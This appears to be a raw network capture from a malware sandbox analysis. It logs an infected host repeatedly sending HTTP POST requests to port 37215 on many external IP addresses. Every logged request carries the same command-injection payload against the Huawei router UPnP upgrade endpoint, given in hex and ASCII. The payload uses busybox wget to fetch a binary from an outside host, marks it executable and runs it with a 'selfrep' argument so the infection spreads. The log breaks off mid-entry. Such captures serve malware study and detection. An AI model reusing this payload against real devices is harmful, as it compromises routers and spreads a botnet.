                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1622192.168.2.1334538197.242.54.3237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.506154060 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1623192.168.2.1350986150.196.14.737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.506249905 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1624192.168.2.134621441.206.194.24837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.506283998 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1625192.168.2.134848484.2.195.6937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.506302118 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1626192.168.2.133315641.17.129.23637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.506414890 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1627192.168.2.1357268177.255.219.3037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.506445885 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1628192.168.2.135880041.28.90.9137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.506493092 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1629192.168.2.135197441.214.83.10337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.506501913 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1630192.168.2.1343024197.192.38.21837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.506520987 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1631192.168.2.1356544197.115.41.2537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.506731033 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 